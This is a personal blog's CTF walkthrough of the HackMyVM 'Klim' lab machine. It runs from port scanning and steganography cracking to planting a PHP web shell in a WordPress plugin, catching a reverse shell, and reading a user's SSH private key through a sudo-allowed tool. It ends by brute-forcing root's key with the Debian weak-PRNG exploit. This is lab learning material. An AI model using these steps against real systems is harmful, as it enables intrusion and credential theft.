Windy's little blog

一切生活中的杂七杂八, and I like CTF.

HackMyVm Klim Walkthrough

HackMyVm Klim Walkthrough

Scan ports.

 nmap -sV -sC -p- -oN ports.log
 Nmap scan report for
 Host is up (0.0024s latency).
 Not shown: 65533 closed ports
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 81:f5:0a:b3:b5:0d:a6:ed:ce:53:93:05:15:17:b1:b0 (RSA)
 |   256 fd:7c:3d:73:f6:a4:c1:74:7b:41:27:68:ec:54:c4:61 (ECDSA)
 |_  256 8c:28:b7:7b:5d:5c:f1:29:91:4e:85:34:26:55:ac:c6 (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Apache2 Ubuntu Default Page: It works Annex02!
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80, found wordpress.

 /index.html           (Status: 200) [Size: 11331]
 /wordpress            (Status: 301) [Size: 320] [-->]

Use wpscan to scan /wordpress, but found nothing useful. Manually check /wp-contents/uploads, found an image.

 ~ wget

Found decrypt password, get file dump.

 ~ stegseek image.jpg /usr/share/wordlists/rock_ascii.txt                                                                                                                                   steghide-0 | 1 [10:35:13]
 StegSeek version 0.5
 Progress: 10.94% (15259007 bytes)          
 [i] --> Found passphrase: "ichliebedich"
 [i] Original filename: "dump"
 [i] Extracting to "image.jpg.out"
 ~ mv image.jpg.out dump

Found login credentials in dump.

 ~ cat dump|grep pwd 
 ~ python3 -c "import urllib.parse;print(urllib.parse.unquote('ss7WhrrnnHOZC%239bQn'))"

Login wordpress, in Plugin Editor, modify one php file and add your php shell code into source.

Then get reverse shell.

 ~ curl 
 ~ nc -nlvp 1234
 Ncat: Version 7.91 ( )
 Ncat: Listening on :::1234
 Ncat: Listening on
 Ncat: Connection from
 Ncat: Connection from
 Linux klim 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 GNU/Linux
  04:51:34 up 29 min,  0 users,  load average: 0.00, 0.00, 0.00
 USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 /bin/sh: 0: can't access tty; job control turned off
 $ id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

Check sudo -l of www-data.

 www-data@klim:/home/klim$ sudo -l
 sudo -l
 Matching Defaults entries for www-data on klim:
     env_reset, mail_badpass,
 User www-data may run the following commands on klim:
     (klim) NOPASSWD: /home/klim/tool

Decompile tool, read the source code. It actually does "cat argv[1]".

 int __cdecl main(int argc, const char **argv, const char **envp)
   size_t v3; // rbx
   size_t v4; // rax
   char s[5]; // [rsp+1Bh] [rbp-25h] BYREF
   char *dest; // [rsp+20h] [rbp-20h]
   size_t size; // [rsp+28h] [rbp-18h]
   strcpy(s, "cat ");
   v3 = strlen(s);
   size = v3 + strlen(argv[1]) + 1;
   dest = (char *)malloc(size);
   strncpy(dest, s, size);
   v4 = strlen(s);
   strncat(dest, argv[1], size - v4);
   return 0;

Get ssh key of user klim.

 www-data@klim:/home/klim$ sudo -u klim ./tool .ssh/id_rsa
 sudo -u klim ./tool .ssh/id_rsa

Login ssh as klim.

 ~ ssh klim@ -i id_rsa 
 Linux klim 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
 The programs included with the Debian GNU/Linux system are free software;
 the exact distribution terms for each program are described in the
 individual files in /usr/share/doc/*/copyright.
 Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
 permitted by applicable law.
 Last login: Sun Jul 25 12:19:50 2021 from
 /usr/bin/xauth:  file /home/klim/.Xauthority does not exist
 klim@klim:~$ id
 uid=1000(klim) gid=1000(klim) groupes=1000(klim),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Found in /opt, following author's hint, use openssl

 ~ searchsploit  openssl                                                                                   ...
 OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH                                                                                           | linux/remote/

Following the steps in poc.

  tar -jxvf 5622.tar.bz2
  python rsa/2048 root 22
  Tested 9979 keys | Remaining 22789 keys | Aprox. Speed 25/sec
 Key Found in file: 54701a3b124be15d4c8d3cf2da8f0139-2005
 Execute: ssh -lroot -p22 -i rsa/2048/54701a3b124be15d4c8d3cf2da8f0139-2005
 Tested 10001 keys | Remaining 22767 keys | Aprox. Speed 4/sec

Get root login.

 ~ ssh root@ -i 54701a3b124be15d4c8d3cf2da8f0139-2005
 root@klim:~# id;hostname              
 uid=0(root) gid=0(root) groupes=0(root)



Powered By Z-BlogPHP 1.7.1